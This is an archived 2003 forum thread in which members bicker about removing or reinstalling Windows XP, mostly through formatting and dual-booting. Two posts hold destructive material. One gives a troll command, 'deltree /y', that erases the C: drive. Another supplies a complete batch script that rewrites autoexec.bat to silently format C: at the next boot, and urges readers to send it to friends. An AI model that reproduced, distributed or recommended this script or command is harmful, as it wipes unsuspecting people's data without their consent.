PDA

View Full Version : For everyone that hates XP

Zelda_Warrior
08-18-2003, 07:48 PM
Here is a way to remove windows xp <or any othere version of windows> first u take what u want and burn a cd with the data or use a shit load of 1.44 meg diskettes and then get 1 dos boot disk with cd drivers on it so u can use the cdrom drive. then boot with that disk in there and type Format C: subsitute C: with whatever drive letter windows is on then type in the cd rom drives assigned letter than type in Setup.exe and follow the install instructions. (cd drive and hard drives will have differnt letters) {the harddrives might not if they are like C: and so forth in order} Have Fun being frustrated with installing windows! [you will need your device drivers if windows doesnt have them pre loaded on the disk]

VEL
08-18-2003, 09:11 PM
Since this isn't about ZC I'll move it to General Discussion.

Gerudo
08-18-2003, 09:27 PM
to remove XP, just go start -> run

type 'command', then hit ok...

type 'cd\'

then type 'deltree /y c:\*.*'

viola, comp is rid of xp...

-_-

Flash Man
08-18-2003, 09:30 PM
A:\>format /dev/hda
Invalid parameter - /dev/hda
Specified drive does not exist.

Jemsee
08-18-2003, 11:00 PM
I'm confused.
You say here is a way to get rid of windows then tell us how to install it.
My thoughts kind of go with what is in Gerudos' sig, Nobody Cares!

Nekui
08-18-2003, 11:15 PM
Why would you want to replace xp with an older Windows? Maybe if you want to use older programs. But really, you should have at least NT or 2000, much more stable than ME and down.

MasterSwordUltima
08-19-2003, 07:51 AM
98 is better than the others, imo...but why don't you just partition your harddrive with another windows, isntead of deleting it?

Jemsee
08-19-2003, 10:22 AM
Originally posted by MasterSwordUltima
98 is better than the others, imo...but why don't you just partition your harddrive with another windows, isntead of deleting it?

That is what I have done.
Not sure if 98 or XP is better, they both have there plus and minus marks.
But I find myself using 98 more than XP mostly because of some of my old programs and hardware.
Like my scanner will not work on XP. It is old but nothing wrong with it.
My didgy camera however works better on XP, 98 sometimes gets confused with it and even loses it.
But mostly ZC and SE work better on 98 so that is where I find myself.

Zelda_Warrior
08-19-2003, 10:35 AM
the reson u just dont re partition it is because you will have 1 hell of a time getting a partition on the drive that dos or anything will recognize plus you loose your data ill stick with formatting thank you.

theplustwo
08-19-2003, 12:40 PM
if you wan't to erase your hard disk, you already know how to do it. if you don't know... it's best to leave something like that to someone who knows about computers, rather than a nigh-unintelligable web post. :shrug:

Zelda_Warrior
08-19-2003, 09:57 PM
Ok I am 13 and have been building computers since I was 7 ive been using them since i was 3 and thats quite a qhile and i know a ton more than this and as a matter of fact ive built 10 computers. in 5th grade i was asked to do a science report on technology and i chose computers and got 100% on it i even opened a harddrive to show people what it was like so i think i know what im doing oh and heres something you probably didnt know u cant delete windows files that are in use which means u cant delete them in windows and the format command in dos is the fastest easiest way to delete everything.

Breaker
08-19-2003, 10:17 PM
Create a batch file,

@echo off
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo format /autotest c:/q>nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul
exit

Send it to all your friends.

Demimore
08-21-2003, 04:35 AM
98 sux. I have it.... Sob. But why would anyone wanna remove their OS? If so, just type Format C: in DOS. That is the easiest way.

inori
08-21-2003, 05:27 AM
Was there a point to this thread? I would understand a question being asked and then answered, but just showing up and posting "Here's how to do X" seems odd. Next, we'll have "Here's how you pick your nose."

:shrug:

AtmaWeapon
08-21-2003, 10:21 AM
Originally posted by Zelda_Warrior
Ok I am 13 and have been building computers since I was 7 ive been using them since i was 3 and thats quite a qhile and i know a ton more than this and as a matter of fact ive built 10 computers. in 5th grade i was asked to do a science report on technology and i chose computers and got 100% on it i even opened a harddrive to show people what it was like so i think i know what im doing oh and heres something you probably didnt know u cant delete windows files that are in use which means u cant delete them in windows and the format command in dos is the fastest easiest way to delete everything.

Well I'll have you know that I'm 19 and I've been working with computers since I was 7, too.I build computers, too. This means I have 6 years experience over you. I've done 3 reports on computers and made a 100% on each of them, INCLUDING the one where I forgot to print two pages of it. I have 3 open hard drives in my room, and I know that that has ABSOLUTELY NOTHING to do with installing windows or proving your credibility. This information means that my penis is the size of an adult cobra. This paragraph is also a writing style used by script kiddies who think that claiming experience makes them an expert. Hello, luser. I imagine your computer is a PENTIUM OPTERON 100 MAGEBYTES WITH 16 MEGATEXELS PER SECOND VOODOO 5 600 BYTES OF QDRAM!!!!!111

You are correct in one thing: you cannot delete a file in use by windows. The command prompt deltree would not complete. However, DELTREE is very much faster than a format for removing files. However, I question your lineage because you simultaneously offer to help remove windows and help install it.

What's so frustrating about Windows install? Next, Next, I agree, Next, License number, Next, OK, OK, OK, you're done! Far better than the time it took me 3 days to install Linux because it couldn't count how much RAM I had by itself.